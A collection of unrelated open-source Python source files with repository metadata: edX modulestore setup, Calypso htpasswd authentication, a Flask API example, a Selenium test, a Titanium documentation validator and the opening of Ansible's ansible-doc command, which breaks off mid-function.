globals().update({sig.name.upper(): sig for sig in SignalHandler.all_signals()})
def load_function(path):
"""
Load a function by name.
Arguments:
path: String of the form 'path.to.module.function'. Strings of the form
'path.to.module:Class.function' are also valid.
Returns:
The imported object 'function'.
"""
if ':' in path:
module_path, _, method_path = path.rpartition(':')
module = import_module(module_path)
class_name, method_name = method_path.split('.')
_class = getattr(module, class_name)
function = getattr(_class, method_name)
else:
module_path, _, name = path.rpartition('.')
function = getattr(import_module(module_path), name)
return function
def create_modulestore_instance(
engine,
content_store,
doc_store_config,
options,
i18n_service=None,
fs_service=None,
user_service=None,
signal_handler=None,
):
"""
This will return a new instance of a modulestore given an engine and options
"""
# Import is placed here to avoid model import at project startup.
import xblock.reference.plugins
class_ = load_function(engine)
_options = {}
_options.update(options)
FUNCTION_KEYS = ['render_template']
for key in FUNCTION_KEYS:
if key in _options and isinstance(_options[key], six.string_types):
_options[key] = load_function(_options[key])
request_cache = DEFAULT_REQUEST_CACHE
try:
metadata_inheritance_cache = caches['mongo_metadata_inheritance']
except InvalidCacheBackendError:
metadata_inheritance_cache = caches['default']
if issubclass(class_, MixedModuleStore):
_options['create_modulestore_instance'] = create_modulestore_instance
if issubclass(class_, BranchSettingMixin):
_options['branch_setting_func'] = _get_modulestore_branch_setting
if HAS_USER_SERVICE and not user_service:
xb_user_service = DjangoXBlockUserService(get_current_user())
else:
xb_user_service = None
xblock_field_data_wrappers = [load_function(path) for path in settings.XBLOCK_FIELD_DATA_WRAPPERS]
def fetch_disabled_xblock_types():
"""
Get the disabled xblock names, using the request_cache if possible to avoid hitting
a database every time the list is needed.
"""
# If the import could not be loaded, return an empty list.
if disabled_xblocks is None:
return []
if 'disabled_xblock_types' not in request_cache.data:
request_cache.data['disabled_xblock_types'] = [block.name for block in disabled_xblocks()]
return request_cache.data['disabled_xblock_types']
return class_(
contentstore=content_store,
metadata_inheritance_cache_subsystem=metadata_inheritance_cache,
request_cache=request_cache,
xblock_mixins=getattr(settings, 'XBLOCK_MIXINS', ()),
xblock_select=getattr(settings, 'XBLOCK_SELECT_FUNCTION', None),
xblock_field_data_wrappers=xblock_field_data_wrappers,
disabled_xblock_types=fetch_disabled_xblock_types,
doc_store_config=doc_store_config,
i18n_service=i18n_service or ModuleI18nService,
fs_service=fs_service or xblock.reference.plugins.FSService(),
user_service=user_service or xb_user_service,
signal_handler=signal_handler or SignalHandler(class_),
**_options
)
# A singleton instance of the Mixed Modulestore
_MIXED_MODULESTORE = None
def modulestore():
"""
Returns the Mixed modulestore
"""
global _MIXED_MODULESTORE # pylint: disable=global-statement
if _MIXED_MODULESTORE is None:
_MIXED_MODULESTORE = create_modulestore_instance(
settings.MODULESTORE['default']['ENGINE'],
contentstore(),
settings.MODULESTORE['default'].get('DOC_STORE_CONFIG', {}),
settings.MODULESTORE['default'].get('OPTIONS', {})
)
if settings.FEATURES.get('CUSTOM_COURSES_EDX'):
# TODO: This import prevents a circular import issue, but is
# symptomatic of a lib having a dependency on code in lms. This
# should be updated to have a setting that enumerates modulestore
# wrappers and then uses that setting to wrap the modulestore in
# appropriate wrappers depending on enabled features.
from lms.djangoapps.ccx.modulestore import CCXModulestoreWrapper
_MIXED_MODULESTORE = CCXModulestoreWrapper(_MIXED_MODULESTORE)
return _MIXED_MODULESTORE
def clear_existing_modulestores():
"""
Clear the existing modulestore instances, causing
them to be re-created when accessed again.
This is useful for flushing state between unit tests.
"""
global _MIXED_MODULESTORE # pylint: disable=global-statement
_MIXED_MODULESTORE = None
class ModuleI18nService(object):
"""
Implement the XBlock runtime "i18n" service.
Mostly a pass-through to Django's translation module.
django.utils.translation implements the gettext.Translations interface (it
has ugettext, ungettext, etc), so we can use it directly as the runtime
i18n service.
"""
def __init__(self, block=None):
"""
Attempt to load an XBlock-specific GNU gettext translator using the XBlock's own domain
translation catalog, currently expected to be found at:
<xblock_root>/conf/locale/<language>/LC_MESSAGES/<domain>.po|mo
If we can't locate the domain translation catalog then we fall-back onto
django.utils.translation, which will point to the system's own domain translation catalog
This effectively achieves translations by coincidence for an XBlock which does not provide
its own dedicated translation catalog along with its implementation.
"""
self.translator = django.utils.translation
if block:
xblock_class = getattr(block, 'unmixed_class', block.__class__)
xblock_resource = xblock_class.__module__
xblock_locale_dir = 'translations'
xblock_locale_path = resource_filename(xblock_resource, xblock_locale_dir)
xblock_domain = 'text'
selected_language = get_language()
try:
self.translator = gettext.translation(
xblock_domain,
xblock_locale_path,
[to_locale(selected_language if selected_language else settings.LANGUAGE_CODE)]
)
except IOError:
# Fall back to the default Django translator if the XBlock translator is not found.
pass
def __getattr__(self, name):
name = 'gettext' if six.PY3 and name == 'ugettext' else name
return getattr(self.translator, name)
def strftime(self, *args, **kwargs):
"""
A locale-aware implementation of strftime.
"""
# This is the wrong place to import this function. I'm putting it here
# because the xmodule test suite can't import this module, because
# Django is not available in that suite. This function isn't called in
# that suite, so this hides the import so the test won't fail.
#
# As I said, this is wrong. But Cale says this code will soon be
# refactored to a place that will be right, and the code can be made
# right there. If you are reading this comment after April 1, 2014,
# then Cale was a liar.
from util.date_utils import strftime_localized
return strftime_localized(*args, **kwargs)
def _get_modulestore_branch_setting():
"""
Returns the branch setting for the module store from the current Django request if configured,
else returns the branch value from the configuration settings if set,
else returns None
The value of the branch setting is cached in a thread-local variable so it is not repeatedly recomputed
"""
def get_branch_setting():
"""
Finds and returns the branch setting based on the Django request and the configuration settings
"""
branch = None
hostname = get_current_request_hostname()
if hostname:
# get mapping information which is defined in configurations
mappings = getattr(settings, 'HOSTNAME_MODULESTORE_DEFAULT_MAPPINGS', None)
# compare hostname against the regex expressions set of mappings which will tell us which branch to use
if mappings:
for key in mappings:
if re.match(key, hostname):
return mappings[key]
if branch is None:
branch = getattr(settings, 'MODULESTORE_BRANCH', None)
return branch
# leaving this in code structured in closure-friendly format b/c we might eventually cache this (again)
# using request_cache
return get_branch_setting()
|
msegado/edx-platform
|
common/lib/xmodule/xmodule/modulestore/django.py
|
Python
|
agpl-3.0
| 16,136
|
#!/usr/bin/python
from datetime import datetime
class Test(object):
def __init__(self):
self._bla = 0
def incr(self):
self._bla += 1
def meth1():
t = Test()
for _ in xrange(1000000):
t.incr()
def meth2():
t = Test()
incr = t.incr
for _ in xrange(1000000):
incr()
def start():
a = datetime.now()
meth2()
b = datetime.now()
print b - a
a = datetime.now()
meth1()
b = datetime.now()
print b - a
pass
if __name__ == '__main__':
start()
|
david-furminieux/movingForest
|
src/methPerf.py
|
Python
|
lgpl-3.0
| 547
|
# -*- coding: utf-8 -*-
#
# This file is part of Calypso Server - Calendar Server
# Copyright © 2008-2011 Guillaume Ayoub
# Copyright © 2008 Nicolas Kandel
# Copyright © 2008 Pascal Halter
#
# This library is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Calypso. If not, see <http://www.gnu.org/licenses/>.
"""
Htpasswd ACL.
Load the list of login/password couples according a the configuration file
created by Apache ``htpasswd`` command. Plain-text, crypt and sha1 are
supported, but md5 is not (see ``htpasswd`` man page to understand why).
"""
import base64
import hashlib
import os.path
import logging
try:
import bcrypt
have_bcrypt = True
except ImportError:
have_bcrypt = False
from calypso import config
log = logging.getLogger()
def _plain(hash_value, password):
"""Check if ``hash_value`` and ``password`` match using plain method."""
return hash_value == password
def _crypt(hash_value, password):
"""Check if ``hash_value`` and ``password`` match using crypt method."""
# The ``crypt`` module is only present on Unix, import if needed
import crypt
return crypt.crypt(password, hash_value) == hash_value
def _sha1(hash_value, password):
"""Check if ``hash_value`` and ``password`` match using sha1 method."""
hash_value = hash_value.replace("{SHA}", "").encode("ascii")
password = password.encode(config.get("encoding", "stock"))
sha1 = hashlib.sha1() # pylint: disable=E1101
sha1.update(password)
return sha1.digest() == base64.b64decode(hash_value)
def _bcrypt(hash_value, password):
if have_bcrypt:
password = password.encode(config.get("encoding", "stock"))
return bcrypt.hashpw(password, hash_value) == hash_value
else:
log.error("Bcrypt module is missing, cannot authenticate")
return False
def has_right(owner, user, password):
"""Check if ``user``/``password`` couple is valid."""
log.debug("owner '%s' user '%s'", owner, user)
for line in open(FILENAME).readlines():
if line.strip():
login, hash_value = line.strip().split(":", 1)
if login == user and (not PERSONAL or user == owner):
return CHECK_PASSWORD(hash_value, password)
return False
FILENAME = os.path.expanduser(config.get("acl", "filename"))
PERSONAL = config.getboolean("acl", "personal")
CHECK_PASSWORD = locals()["_%s" % config.get("acl", "encryption")]
|
agx/calypso
|
calypso/acl/htpasswd.py
|
Python
|
gpl-3.0
| 2,935
|
#!/usr/bin/env python
from flask import Flask
from flask.ext.saresource import SAResource
from models import db_session
from models import Todo
app = Flask(__name__)
api = SAResource(app, db_session, url_prefix='/api/v0.1')
# registers GET/POST/DELETE/PUT endpoints at '/api/v0.1/todos' (tablename used for url by default)
api.add_resource(Todo)
app.run(debug=True)
|
mmautner/Flask-SAResource
|
examples/app.py
|
Python
|
mit
| 373
|
import time
import os
import sys
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from nw_util import *
chrome_options = Options()
chrome_options.add_argument("nwapp=" + os.path.dirname(os.path.abspath(__file__)))
driver = webdriver.Chrome(executable_path=os.environ['CHROMEDRIVER'], chrome_options=chrome_options)
try:
wait_switch_window_name(driver, 'index')
print driver.current_url
result = wait_for_element_id(driver, 'result')
result2 = wait_for_element_id(driver, 'result2')
print result
print result2
assert(result == 'success from popup' and result2 == 'startiframe')
finally:
#time.sleep(50)
driver.quit()
|
nwjs/nw.js
|
test/sanity/document-start-end/test.py
|
Python
|
mit
| 768
|
initialRobotLoc(2.0, 0.5)
dimensions(4.05,6.05)
wall((1.5,3.0),(3.0,3.0))
wall((3.0, 3.0),(3.0,3.5))
wall((3.0,3.5),(2.0,3.5))
wall((2.0,3.5),(2.0,4.5))
wall((2.0,4.5),(1.5,4.5))
wall((1.5,4.5),(1.5,3.0))
wall((1.2,1.5),(3.0,1.5))
wall((3.0, 1.5),(3.0,2.0))
wall((3.0,2.0),(1.2,2.0))
wall((1.2,2.0),(1.2,1.5))
|
Cynary/distro6.01
|
arch/6.01Soft/lib601-F13-4/soar/worlds/raceWorld.py
|
Python
|
mit
| 312
|
#!/usr/bin/env python
#
# A simple command line validator for TDoc2 YAML/Markdown based documentation
#
import os, sys, re
apiDocDir = os.path.abspath(os.path.dirname(__file__))
# We package markdown in support/common.
commonSupportDir = os.path.abspath(os.path.join(apiDocDir, '..', 'support', 'common'))
if os.path.exists(commonSupportDir):
sys.path.append(commonSupportDir)
import codecs, optparse, platform
import markdown
try:
import yaml
except:
print >> sys.stderr, "You don't have pyyaml!\n"
print >> sys.stderr, "You can install it with:\n"
print >> sys.stderr, "> sudo easy_install pyyaml\n"
print >> sys.stderr, ""
sys.exit(1)
VALID_PLATFORMS = ["android", "iphone", "ipad", "mobileweb"]
VALID_KEYS = {
"type": ["name", "summary", "description", "createable", "platforms", "extends",
"excludes", "since", "deprecated", "osver", "examples", "methods", "properties",
"events"],
"method": ["name", "summary", "description", "returns", "platforms", "since",
"deprecated", "osver", "examples", "parameters"],
"parameter": ["name", "summary", "type", "optional", "default", "repeatable"],
"property": ["name", "summary", "description", "type", "platforms", "since",
"deprecated", "osver", "examples", "permission", "availability", "accessors",
"optional", "value", "default"],
"event": ["name", "summary", "description", "extends", "platforms", "since",
"deprecated", "osver", "properties"],
"eventprop": ["name", "summary", "type", "platforms", "deprecated"],
"deprecated": ["since", "removed", "notes"]
}
types = {}
typesFromDocgen = None
errorTrackers = {}
options = None
def stringFrom(error):
if isinstance(error, basestring):
return error
elif isinstance(error, dict):
return "returns - " + str(error)
else:
return error.name
class Printer:
def __init__(self):
self.error_count = 0;
def errorCount(self):
return self.error_count;
class PrettyPrinter(Printer):
def printCheck(self, error, indent=1):
if not options.errorsOnly:
print u'%s\u2713 \033[92m%s\033[0m' % ('\t' * indent, stringFrom(error))
def printError(self, error, indent=1):
print >>sys.stderr, u'%s\u0078 \033[91m%s\033[0m' % ('\t' * indent, stringFrom(error))
def printStatus(self, path, error):
if not options.errorsOnly or error.hasErrors():
print '%s:' % path
self.printTrackerStatus(error)
def printTrackerStatus(self, error, indent=1):
if error.hasErrors():
self.printError(error, indent)
elif options.verbose or indent == 1:
self.printCheck(error, indent)
for msg in error.errors:
self.printError(msg, indent + 1)
self.error_count += 1
for child in error.children:
self.printTrackerStatus(child, indent + 1)
class SimplePrinter(Printer):
def printStatus(self, path, error):
self.printTrackerStatus(error, path)
def addField(self, line, field):
if len(line) > 0:
line += " : "
line += stringFrom(field)
return line
def printTrackerStatus(self, error, line = ""):
line = self.addField(line, error.name)
for msg in error.errors:
self.printError(self.addField(line, msg))
if len(error.children) > 0:
for child in error.children:
self.printTrackerStatus(child, line)
else:
self.printCheck(line)
def printCheck(self, msg):
if not options.errorsOnly:
print "PASS: " + msg
def printError(self, msg):
print "FAIL: " + msg
self.error_count += 1
class ErrorTracker(object):
TRACKER_FOR_TYPE = 0
TRACKER_FOR_METHOD = 1
TRACKER_FOR_PROPERTY = 2
TRACKER_FOR_EVENT = 3
TRACKER_FOR_METHOD_PARAMETER = 4
TRACKER_FOR_EVENT_PROPERTY = 5
TRACKER_FOR_REF = 5
def __init__(self, name, trackerFor, parent=None):
self.name = name
self.trackerFor = trackerFor
self.errors = []
self.children = []
self.parent = parent
if self.parent != None:
self.parent.children.append(self)
def trackError(self, description):
self.errors.append(description)
def getTracker(self, childName):
for child in self.children:
if child.name == childName:
return child
return None
def hasErrors(self):
if len(self.errors) > 0:
return True
for child in self.children:
if child.hasErrors():
return True
return False
def validateKeys(tracker, obj, objType, displayName=None):
validKeys = VALID_KEYS[objType]
if not isinstance(obj, dict):
return
if displayName:
objName = displayName
elif "name" in obj:
objName = obj["name"]
else:
objName = "object"
invalid = [k for k in obj.keys() if k not in validKeys]
if invalid:
tracker.trackError("Invalid key(s) in %s: %s" % (objName, invalid))
# A missing piece of documentation could be inherited, since we
# support that as-of TIMOB-7419. This checks to see if its there
# after all inherited documentation has been resolved.
def propertyIsGenerated(tracker, propertyName):
parent = tracker.parent
if not parent:
return False
while parent.parent:
parent = parent.parent
if parent.trackerFor != ErrorTracker.TRACKER_FOR_TYPE:
return False
typeName = parent.name
if typeName not in typesFromDocgen:
return False
generatedType = typesFromDocgen[typeName]
memberToCheck = None
listType = None
if tracker.trackerFor == ErrorTracker.TRACKER_FOR_METHOD:
listType = "methods"
elif tracker.trackerFor == ErrorTracker.TRACKER_FOR_PROPERTY:
listType = "properties"
elif tracker.trackerFor == ErrorTracker.TRACKER_FOR_EVENT:
listType = "events"
if not memberToCheck and listType:
the_list = generatedType[listType]
matching_members = [m for m in the_list if m["name"] == tracker.name]
if matching_members:
memberToCheck = matching_members[0]
if not memberToCheck:
return False
else:
return propertyName in memberToCheck
def validateRequired(tracker, map, required):
for r in required:
if r not in map and not propertyIsGenerated(tracker, r):
tracker.trackError('Required property "%s" not found' % r)
def validatePlatforms(tracker, platforms):
if type(platforms) != list:
tracker.trackError('"platforms" specified, but isn\'t a list: %s' % platforms)
for p in platforms:
if p not in VALID_PLATFORMS:
tracker.trackError('platform specifier "%s" is not valid. Valid platforms are: %s.' % (p, VALID_PLATFORMS))
def validateSince(tracker, since):
if type(since) not in [str, dict]:
tracker.trackError('"since" should either be a version inside a string, or a dictionary of platform to version: %s, %s' % (since, type(since)))
def validateDeprecated(tracker, deprecated):
if type(deprecated) != dict or 'since' not in deprecated:
tracker.trackError('"deprecated" should be a dictionary with "since" and optional "removed" versions: %s' % deprecated)
validateKeys(tracker, deprecated, "deprecated", "deprecated")
def validateOsVer(tracker, osver):
if type(osver) != dict:
tracker.trackError('"osver" should be a dictionary of platforms to version dictionaries')
for key, value in osver.iteritems():
if type(value) != dict:
tracker.trackError('"osver" for platform "%s" should be a dictionary with platforms mapping to dictionaries of "mix" (String), "max" (String), and/or "versions" (List)' % (key, value))
def validateIsBool(tracker, name, value):
if not isinstance(value, bool):
tracker.trackError('"%s" should either be true or false: %s, %s' % (name, value, type(value)))
def validateIsOneOf(tracker, name, value, validValues):
if value not in validValues:
tracker.trackError('"%s" should be one of %s, but was %s' % (name, ", ".join(validValues), value))
def validateMarkdown(tracker, mdData, name):
try:
html = markdown.markdown(mdData)
except Exception, e:
tracker.trackError('Error parsing markdown block "%s": %s' % (name, e))
def findType(tracker, typeName, name):
base_types = ('void', 'Dictionary', 'Boolean', 'Number', 'String', 'Date', 'Object', 'Callback')
if typeName in base_types:
return
containerRegex = r'(Dictionary|Callback|Array)\<([^\>]+)\>'
match = re.match(containerRegex, typeName)
if match:
if not typeName.endswith('>>'):
elementType = match.group(2)
findType(tracker, elementType, name)
return
else:
# We've got something like Array<Dictionary<Titanium.Map.Annotation>>
pos = typeName.index('<')
findType(tracker, typeName[pos+1:-1], name)
return
found = False
for tdocPath, tdocTypes in types.iteritems():
for t in tdocTypes:
if 'name' in t and t['name'] == typeName:
found = True
break
if not found:
properCase = "%s%s" % (typeName[0].upper(), typeName[1:])
if properCase in base_types:
tracker.trackError('"%s" type "%s" could not be found, perhaps "%s" was meant' % (name, typeName, properCase))
elif typeName.lower() == 'void':
# "void" is an exception to the proper casing
tracker.trackError('"%s" type "%s" could not be found, perhaps "void" was meant' % (name, typeName))
else:
tracker.trackError('"%s" type "%s" could not be found' % (name, typeName))
def validateCommon(tracker, map):
if 'platforms' in map:
validatePlatforms(tracker, map['platforms'])
if 'since' in map:
validateSince(tracker, map['since'])
if 'deprecated' in map:
validateDeprecated(tracker, map['deprecated'])
if 'osver' in map:
validateOsVer(tracker, map['osver'])
if 'createable' in map:
validateIsBool(tracker, 'createable', map['createable'])
if 'permission' in map:
validateIsOneOf(tracker, 'permission', map['permission'],
('read-only', 'write-only', 'read-write'))
if 'availability' in map:
validateIsOneOf(tracker, 'availability', map['availability'],
('always', 'creation', 'not-creation'))
if 'accessors' in map:
validateIsBool(tracker, 'accessors', map['accessors'])
if 'optional' in map:
validateIsBool(tracker, 'optional', map['optional'])
if 'repeatable' in map:
validateIsBool(tracker, 'repeatable', map['repeatable'])
if 'notes' in map:
tracker.trackError('"notes" field is no longer valid')
if options.validateSummary:
if 'summary' in map:
summary = map['summary']
if not summary is None and not len(summary.strip()) == 0:
summary = summary.strip()
if not summary[0].isupper or summary[-1] != ".":
tracker.trackError('summary fields should start with a capital letter and end with a period. summary: %s' % summary)
else:
tracker.trackError('summary missing required text.')
def validateMethod(typeTracker, method):
tracker = ErrorTracker(method['name'], ErrorTracker.TRACKER_FOR_METHOD, typeTracker)
validateKeys(tracker, method, "method")
validateRequired(tracker, method, ['name', 'summary'])
validateCommon(tracker, method)
if 'returns' in method:
returns = method['returns']
if type(returns) != dict and type(returns) != list:
tracker.trackError('"returns" must be an Object or list of Objects: %s' % returns)
return
if type(returns) != list:
returns = [returns]
for oneReturn in returns:
if type(oneReturn) != dict:
tracker.trackError('"returns" must be an Object or list of Objects: %s' % returns)
return
if 'type' not in oneReturn:
tracker.trackError('Required property "type" missing in "returns": %s' % returns)
if not isinstance(oneReturn["type"], basestring):
tracker.trackError('"type" value of returns element must be a string.' % oneReturn["type"])
if 'parameters' in method:
if type(method['parameters']) != list:
tracker.trackError('"parameters" must be a list')
for param in method['parameters']:
pTracker = ErrorTracker(param['name'], ErrorTracker.TRACKER_FOR_METHOD_PARAMETER, tracker)
validateKeys(pTracker, param, "parameter")
validateRequired(pTracker, param, ['name', 'summary', 'type'])
validateCommon(pTracker, param)
if 'examples' in method:
validateExamples(tracker, method['examples'])
def validateProperty(typeTracker, property):
tracker = ErrorTracker(property['name'], ErrorTracker.TRACKER_FOR_PROPERTY, typeTracker)
validateKeys(tracker, property, "property")
validateRequired(tracker, property, ['name', 'summary', 'type'])
validateCommon(tracker, property)
if 'examples' in property:
validateExamples(tracker, property['examples'])
constantRegex = r'[A-Z]+[A-Z_]*'
match = re.match(constantRegex, property['name'])
if match:
if not 'permission' in property:
tracker.trackError('Required property for constant "permission" not found')
else:
if not property['permission'] == 'read-only':
tracker.trackError("Constant should have 'read-only' permission.")
def validateEvent(typeTracker, event):
tracker = ErrorTracker(event['name'], ErrorTracker.TRACKER_FOR_EVENT, typeTracker)
validateKeys(tracker, event, "event")
validateRequired(tracker, event, ['name', 'summary'])
validateCommon(tracker, event)
if 'properties' in event:
if type(event['properties']) != list:
tracker.trackError('"properties" specified, but isn\'t a list')
return
for p in event['properties']:
pTracker = ErrorTracker(p['name'], ErrorTracker.TRACKER_FOR_EVENT_PROPERTY, tracker)
validateKeys(pTracker, p, "eventprop")
validateRequired(pTracker, p, ['name', 'summary'])
validateCommon(pTracker, p)
def validateExamples(tracker, examples):
if not isinstance(examples, list):
tracker.trackError('"examples" must be a list: %s' % examples)
return
for example in examples:
if not isinstance(example, dict) or 'title' not in example or 'example' not in example:
tracker.trackError('each example must be a dict with "title" and "example" members: %s' % example)
continue
validateMarkdown(tracker, example['example'], 'example')
def validateExcludes(tracker, excludes):
if not isinstance(excludes, dict):
tracker.trackError('"excludes" must be a dict and cannot be empty')
return
for category in excludes:
if category not in ['events','properties','methods']:
tracker.trackError('only "events","properties", and "methods" are allowed in "excludes": %s' % category)
continue
if not isinstance(excludes[category], list):
tracker.trackError('"%s" must be a list' % category)
continue
def validateType(typeDoc):
typeName = typeDoc['name']
errorTrackers[typeName] = ErrorTracker(typeName, ErrorTracker.TRACKER_FOR_TYPE)
tracker = errorTrackers[typeName]
validateRequired(tracker, typeDoc, ['name', 'summary'])
validateCommon(tracker, typeDoc)
if 'excludes' in typeDoc:
validateExcludes(tracker, typeDoc['excludes'])
if 'description' in typeDoc:
validateMarkdown(tracker, typeDoc['description'], 'description')
if 'examples' in typeDoc:
validateExamples(tracker, typeDoc['examples'])
if 'methods' in typeDoc:
if type(typeDoc['methods']) != list:
tracker.trackError('"methods" specified, but isn\'t a list')
else:
for method in typeDoc['methods']:
validateMethod(tracker, method)
if 'properties' in typeDoc:
if type(typeDoc['properties']) != list:
tracker.trackError('"properties" specified, but isn\'t a list')
else:
for property in typeDoc['properties']:
validateProperty(tracker, property)
if 'events' in typeDoc:
if type(typeDoc['events']) != list:
tracker.trackError('"events" specified, but isn\'t a list')
else:
for event in typeDoc['events']:
validateEvent(tracker, event)
def loadTypesFromDocgen():
global typesFromDocgen
import docgen
docgen.log.level = 2 # INFO
docgen.process_yaml()
docgen.finish_partial_overrides()
typesFromDocgen = docgen.apis
def validateTDoc(tdocPath):
global typesFromDocgen
tdocTypes = [type for type in yaml.load_all(codecs.open(tdocPath, 'r', 'utf8').read())]
if options.parseOnly:
return
if not typesFromDocgen:
try:
loadTypesFromDocgen()
except Exception, e:
# This should be fatal
print >> sys.stderr, e
sys.exit(1)
for type in tdocTypes:
validateType(type)
global types
types[tdocPath] = tdocTypes
def validateRef(tracker, ref, name):
if type(ref) not in [str, list]:
tracker.trackError('"%s" reference "%s" must be either a String or List' % (name, ref))
if type(ref) is str:
findType(tracker, ref, name)
elif type(ref) is list:
for t in ref:
findType(tracker, t, name)
def validateMethodRefs(typeTracker, method):
tracker = typeTracker.getTracker(method['name'])
if 'returns' in method:
if type(method['returns']) == str:
validateRef(tracker, method['returns'], 'returns')
elif type(method['returns']) == dict:
returnObj = method['returns']
rTracker = ErrorTracker(returnObj, ErrorTracker.TRACKER_FOR_REF, tracker)
if 'type' in returnObj:
validateRef(rTracker, returnObj['type'], 'type')
if 'parameters' in method:
for param in method['parameters']:
pTracker = tracker.getTracker(param['name'])
if 'type' in param:
validateRef(pTracker, param['type'], 'type')
def validateRefs():
for tdocPath, tdocTypes in types.iteritems():
for typeDoc in tdocTypes:
tracker = errorTrackers[typeDoc['name']]
if 'extends' in typeDoc:
validateRef(tracker, typeDoc['extends'], 'extends')
if 'methods' in typeDoc:
for method in typeDoc['methods']:
validateMethodRefs(tracker, method)
if 'properties' in typeDoc:
for property in typeDoc['properties']:
pTracker = tracker.getTracker(property['name'])
if 'type' in property:
validateRef(pTracker, property['type'], 'type')
def validateDir(dir):
for root, dirs, files in os.walk(dir):
for file in files:
if file.endswith(".yml") and file != "template.yml":
absolutePath = os.path.join(root, file)
try:
validateTDoc(absolutePath)
except Exception, e:
print >> sys.stderr, ("Error parsing %s: %s:" % (os.path.join(root,file), str(e)))
validateRefs()
def printStatus(dir=None):
if options.format == 'pretty':
printer = PrettyPrinter()
elif options.format == 'simple':
printer = SimplePrinter()
else:
print >> sys.stderr, "Invalid output style: %s. Use 'pretty' or 'simple'" % options.format
sys.exit(1)
keys = types.keys()
keys.sort()
for key in keys:
tdocPath = key
tdocTypes = types[key]
if dir: tdocPath = tdocPath[len(dir)+1:]
for type in tdocTypes:
printer.printStatus(tdocPath, errorTrackers[type["name"]])
print "Errors encountered: %s" % printer.errorCount()
def main(args):
parser = optparse.OptionParser()
parser.add_option('-v', '--verbose', dest='verbose',
action='store_true', default=False, help='enable verbose validation output')
parser.add_option('-d', '--dir', dest='dir',
default=None, help='directory to recursively validate *.yml TDoc2 files')
parser.add_option('-f', '--file', dest='file',
default=None, help='specific TDoc2 file to validate (overrides -d/--dir)')
parser.add_option('-p', '--parse-only', dest='parseOnly',
action='store_true', default=False, help='only check yaml parse-ability')
format_default = "pretty"
if "windows" in platform.system().lower() or "cygwin" in platform.system().lower():
format_default = "simple"
parser.add_option('-s', '--style', dest='format',
default=format_default, help='output style: pretty (default) or simple.')
parser.add_option('-e', '--errors-only', dest='errorsOnly',
action='store_true', default=False, help='only emit failed validations')
parser.add_option('--warn-summary', dest='validateSummary',
action='store_true', default=False, help='validate summary field')
global options
(options, args) = parser.parse_args(args)
dir=None
if options.file is not None:
# NOTE: because of the introduction of inherited documentation
# fields via TIMOB-7419, using the -f option is not really that
# fast anymore because even if we're just validating one file we need
# to parse all of them in order to see the "final" set of documentation
# for a type.
print "Validating %s:" % options.file
validateTDoc(options.file)
else:
dir = options.dir or apiDocDir
validateDir(dir)
printStatus(dir)
if __name__ == "__main__":
main(sys.argv)
|
hieupham007/Titanium_Mobile
|
apidoc/validate.py
|
Python
|
apache-2.0
| 19,765
|
# (c) 2014, James Tanner <tanner.jc@gmail.com>
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import datetime
import json
import os
import textwrap
import traceback
import yaml
import ansible.plugins.loader as plugin_loader
from ansible import constants as C
from ansible.cli import CLI
from ansible.errors import AnsibleError, AnsibleOptionsError
from ansible.module_utils._text import to_native
from ansible.module_utils.common._collections_compat import Sequence
from ansible.module_utils.six import string_types
from ansible.parsing.metadata import extract_metadata
from ansible.parsing.plugin_docs import read_docstub
from ansible.parsing.yaml.dumper import AnsibleDumper
from ansible.plugins.loader import action_loader, fragment_loader
from ansible.utils.plugin_docs import BLACKLIST, get_docstring
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
class DocCLI(CLI):
''' displays information on modules installed in Ansible libraries.
It displays a terse listing of plugins and their short descriptions,
provides a printout of their DOCUMENTATION strings,
and it can create a short "snippet" which can be pasted into a playbook. '''
# default ignore list for detailed views
IGNORE = ('module', 'docuri', 'version_added', 'short_description', 'now_date', 'plainexamples', 'returndocs')
def __init__(self, args):
super(DocCLI, self).__init__(args)
self.plugin_list = set()
def parse(self):
self.parser = CLI.base_parser(
usage='usage: %prog [-l|-F|-s] [options] [-t <plugin type> ] [plugin]',
module_opts=True,
desc="plugin documentation tool",
epilog="See man pages for Ansible CLI options or website for tutorials https://docs.ansible.com"
)
self.parser.add_option("-F", "--list_files", action="store_true", default=False, dest="list_files",
help='Show plugin names and their source files without summaries (implies --list)')
self.parser.add_option("-l", "--list", action="store_true", default=False, dest='list_dir',
help='List available plugins')
self.parser.add_option("-s", "--snippet", action="store_true", default=False, dest='show_snippet',
help='Show playbook snippet for specified plugin(s)')
self.parser.add_option("-a", "--all", action="store_true", default=False, dest='all_plugins',
help='**For internal testing only** Show documentation for all plugins.')
self.parser.add_option("-j", "--json", action="store_true", default=False, dest='json_dump',
help='**For internal testing only** Dump json metadata for all plugins.')
self.parser.add_option("-t", "--type", action="store", default='module', dest='type', type='choice',
help='Choose which plugin type (defaults to "module")',
choices=C.DOCUMENTABLE_PLUGINS)
super(DocCLI, self).parse()
if [self.options.all_plugins, self.options.json_dump, self.options.list_dir, self.options.list_files, self.options.show_snippet].count(True) > 1:
raise AnsibleOptionsError("Only one of -l, -F, -s, -j or -a can be used at the same time.")
display.verbosity = self.options.verbosity
def run(self):
super(DocCLI, self).run()
plugin_type = self.options.type
if plugin_type in C.DOCUMENTABLE_PLUGINS:
loader = getattr(plugin_loader, '%s_loader' % plugin_type)
else:
raise AnsibleOptionsError("Unknown or undocumentable plugin type: %s" % plugin_type)
# add to plugin path from command line
if self.options.module_path:
for path in self.options.module_path:
if path:
loader.add_directory(path)
# save only top level paths for errors
search_paths = DocCLI.print_paths(loader)
loader._paths = None # reset so we can use subdirs below
# list plugins names and filepath for type
if self.options.list_files:
paths = loader._get_paths()
for path in paths:
